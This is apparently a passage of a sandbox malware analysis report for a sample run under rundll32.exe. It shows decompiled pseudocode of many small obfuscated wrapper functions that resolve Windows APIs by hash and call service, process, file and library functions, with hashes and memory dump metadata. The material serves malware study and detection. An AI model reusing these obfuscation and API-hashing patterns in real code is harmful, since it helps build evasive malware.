				E0024602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002507A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00254f80
0x00254f81
0x00254f82
0x00254f86
0x00254f87
0x00254f8c
0x00254fa5
0x00254fa8
0x00254faf
0x00254fb6
0x00254fc7
0x00254fca
0x00254fd7
0x00254fe2
0x00254fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00254FE2

Strings

{#lm, xrefs: 00254FC2

Memory Dump Source

Source File: 0000000A.00000002.2112719680.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.2112711745.0000000000240000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2112780606.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 06239dc362f97eaa70eb23fd74c1e17bb42c55f8652e937dc061d02bd2fd5417
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 03F037B081120CFFDB08DFA4D98689EBFBAEB44300F208199E804AB250D3715B549B55

Uniqueness

Uniqueness Score: -1.00%

Function 0025976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0025976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002507A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00259772
0x00259773
0x00259778
0x0025977a
0x0025977b
0x0025977e
0x0025977f
0x00259782
0x00259785
0x00259788
0x00259789
0x0025978c
0x0025978f
0x00259790
0x00259791
0x00259794
0x00259797
0x0025979a
0x0025979d
0x002597a0
0x002597a3
0x002597a6
0x002597a7
0x002597a8
0x002597ad
0x002597b7
0x002597c3
0x002597ca
0x002597d1
0x002597d8
0x002597df
0x002597e3
0x002597fc
0x00259816
0x0025981d

APIs

CreateProcessW.KERNEL32(0024591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0024591A), ref: 00259816

Memory Dump Source

Source File: 0000000A.00000002.2112719680.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.2112711745.0000000000240000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2112780606.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 1e14ee12d85c589b7e607ebae06fa3d48f7016d811bdd3277a2a5c3a4f5dd12d
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 2311B072911188BBDF1A9F96DC0ACDF7F7AEF89750F108148FA1556120D2728A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0024B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0024B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0024602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002507A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0024b569
0x0024b56a
0x0024b56d
0x0024b572
0x0024b574
0x0024b577
0x0024b57a
0x0024b57d
0x0024b580
0x0024b583
0x0024b586
0x0024b587
0x0024b58a
0x0024b58d
0x0024b590
0x0024b593
0x0024b594
0x0024b595
0x0024b59a
0x0024b5a4
0x0024b5b8
0x0024b5c0
0x0024b5c4
0x0024b5cb
0x0024b5d2
0x0024b5d9
0x0024b5e6
0x0024b5fd
0x0024b604

APIs

CreateFileW.KERNELBASE(00250668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00250668,?,?,?,?), ref: 0024B5FD

Memory Dump Source

Source File: 0000000A.00000002.2112719680.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.2112711745.0000000000240000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2112780606.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: da88616ffe8399f7017eec6f07960afbc01f85520a9177dc866ba64319bbb634
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 3111C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A20EB51

Uniqueness

Uniqueness Score: -1.00%

Function 0025981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0025981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002507A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00259821
0x00259822
0x00259825
0x00259828
0x0025982a
0x0025982c
0x0025982f
0x00259832
0x00259835
0x00259836
0x00259837
0x0025983c
0x00259855
0x00259858
0x0025985f
0x00259866
0x0025986d
0x00259874
0x0025987b
0x0025988e
0x0025989b
0x002598a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002487F2,0000CAAE,0000510C,AD82F196), ref: 0025989B

Memory Dump Source

Source File: 0000000A.00000002.2112719680.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.2112711745.0000000000240000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2112780606.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: dfd0e70f4a19a4487747f8be9ec32f2a0c8de25ba219de84762fb4ff62ba155e
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 17015A76801208FBDB08EFD5DC46CDFBF79EF85750F108199F918A6220E6715B619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00257BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00257BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0024602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002507A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00257bf7
0x00257bf8
0x00257bfa
0x00257bfd
0x00257bff
0x00257c02
0x00257c06
0x00257c07
0x00257c0f
0x00257c1d
0x00257c25
0x00257c2d
0x00257c31
0x00257c38
0x00257c3f
0x00257c46
0x00257c4a
0x00257c5e
0x00257c67
0x00257c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00257C67

Memory Dump Source

Source File: 0000000A.00000002.2112719680.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.2112711745.0000000000240000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2112780606.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: f6689cddd0042f70b7a9cdd3172e5f8eaee73f7251d997c54e2e26b7b788de0d
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: EB014FB190120CFFEB09DF94CC4A8DEBBB5EF45314F108198F40567240E6B15F609B91

Uniqueness

Uniqueness Score: -1.00%

Function 0024F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0024F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0024602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002507A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0024f662
0x0024f663
0x0024f665
0x0024f668
0x0024f66a
0x0024f66d
0x0024f670
0x0024f673
0x0024f677
0x0024f678
0x0024f67d
0x0024f687
0x0024f693
0x0024f69a
0x0024f6a1
0x0024f6a5
0x0024f6a9
0x0024f6b0
0x0024f6c9
0x0024f6d8
0x0024f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0024F6D8

Memory Dump Source

Source File: 0000000A.00000002.2112719680.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.2112711745.0000000000240000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2112780606.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 734ab44cd992f2a84b361ecf90ffb5bf997b8202504bb139d782407486199198
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: CC01E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90466250D6B25E21DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0024B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0024B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0024602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002507A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0024b6f3
0x0024b6f8
0x0024b702
0x0024b70b
0x0024b712
0x0024b719
0x0024b720
0x0024b727
0x0024b72e
0x0024b747
0x0024b759
0x0024b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0024B759

Memory Dump Source

Source File: 0000000A.00000002.2112719680.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.2112711745.0000000000240000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2112780606.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: c757ade2f88ba2662d3f67edc083fcb31f26e0c1be5662b87ba0d73f9a050897
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: F1018FB194030CFBEF45DF90DD06E9E7BB5EF08704F108188FA0526190D3B15E209B51

Uniqueness

Uniqueness Score: -1.00%

Function 0025AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0025AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0024602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002507A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0025aa3f
0x0025aa40
0x0025aa41
0x0025aa44
0x0025aa47
0x0025aa4b
0x0025aa4c
0x0025aa51
0x0025aa5b
0x0025aa64
0x0025aa68
0x0025aa6f
0x0025aa76
0x0025aa8d
0x0025aa90
0x0025aa9d
0x0025aaa8
0x0025aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0025AAA8

Memory Dump Source

Source File: 0000000A.00000002.2112719680.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.2112711745.0000000000240000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2112780606.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: 647ffb927a8bba167ed28c8484d0523fe10928a11d52fb189364724a1cd49019
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 43F069B191020CFFDF08DF94DD4A89EBFB4EB45304F108088F805A6250D3B29F649B50

Uniqueness

Uniqueness Score: -1.00%

Function 00245FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00245FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0024602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002507A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00245fb5
0x00245fb6
0x00245fb7
0x00245fbb
0x00245fbc
0x00245fc1
0x00245fcb
0x00245fd7
0x00245fde
0x00245fe5
0x00245ffc
0x00245fff
0x00246006
0x0024600d
0x0024601a
0x00246025
0x0024602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00246025

Memory Dump Source

Source File: 0000000A.00000002.2112719680.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.2112711745.0000000000240000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2112780606.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 1d37de5a285493ab570f975676bc2d59e7d124daa26914a431af30961077462b
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: A7F04FB0C11208FFDB08DFA0ED4689EBFB8EB40300F208198E809A7260E7715F159F55

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 1980 Parent PID: 2748 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	16.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	993
Total number of Limit Nodes:	13

Executed Functions

Function 001F2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E001F2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E001F602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002007A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x001f295f
0x001f2964
0x001f2967
0x001f296a
0x001f296d
0x001f296e
0x001f296f
0x001f2977
0x001f2985
0x001f298a
0x001f2992
0x001f299a
0x001f29a2
0x001f29a9
0x001f29b0
0x001f29b7
0x001f29bb
0x001f29cf
0x001f29dc
0x001f29e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001F29DC

Strings

<^, xrefs: 001F2977

Memory Dump Source

Source File: 0000000B.00000002.2115003226.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000B.00000002.2114981062.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2115042872.000000000020C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 22c181d947d5c3b9079b2eb04d44297966d1c9b7dd736f612a36f4591dae9978
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: 1B018072A00208BFEB14DF95DC4A8DFBFB6EF45310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 001FC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E001FC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E001F602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002007A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x001fc6e1
0x001fc6e6
0x001fc6f0
0x001fc6fc
0x001fc703
0x001fc706
0x001fc70d
0x001fc711
0x001fc715
0x001fc71c
0x001fc723
0x001fc72a
0x001fc731
0x001fc738
0x001fc751
0x001fc762
0x001fc768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 001FC762

Strings

/O, xrefs: 001FC6E6

Memory Dump Source

Source File: 0000000B.00000002.2115003226.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000B.00000002.2114981062.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2115042872.000000000020C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 79b4102c1dea873a57f12ff49eb32eefa7696dc2b46041cafa4feff527189ffe
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: 131133B290122DBBCB25DF95DC498EFBFB8EF05714F108188F90962220D7714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 001F1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E001F1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001F602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002007A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x001f1006
0x001f1009
0x001f100c
0x001f1011
0x001f1016
0x001f101d
0x001f1026
0x001f102d
0x001f1034
0x001f103b
0x001f1047
0x001f104f
0x001f1057
0x001f105e
0x001f1065
0x001f106c
0x001f1073
0x001f1077
0x001f108b
0x001f1096
0x001f109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 001F1096

Strings

[, xrefs: 001F103B

Memory Dump Source

Source File: 0000000B.00000002.2115003226.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000B.00000002.2114981062.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2115042872.000000000020C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: f83f6239cc42481eb679efaf5e71d5d5f3602f9487418f8f8d18f83b15cf1aba
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: 9F016DB6D0130CFBEF04DF94C94A6DEBBB1EF54318F108188F51466291D7B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 001F4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E001F4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002007A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x001f485e
0x001f487a
0x001f487d
0x001f4884
0x001f488b
0x001f4892
0x001f489d
0x001f48a0
0x001f48ad
0x001f48b7

APIs

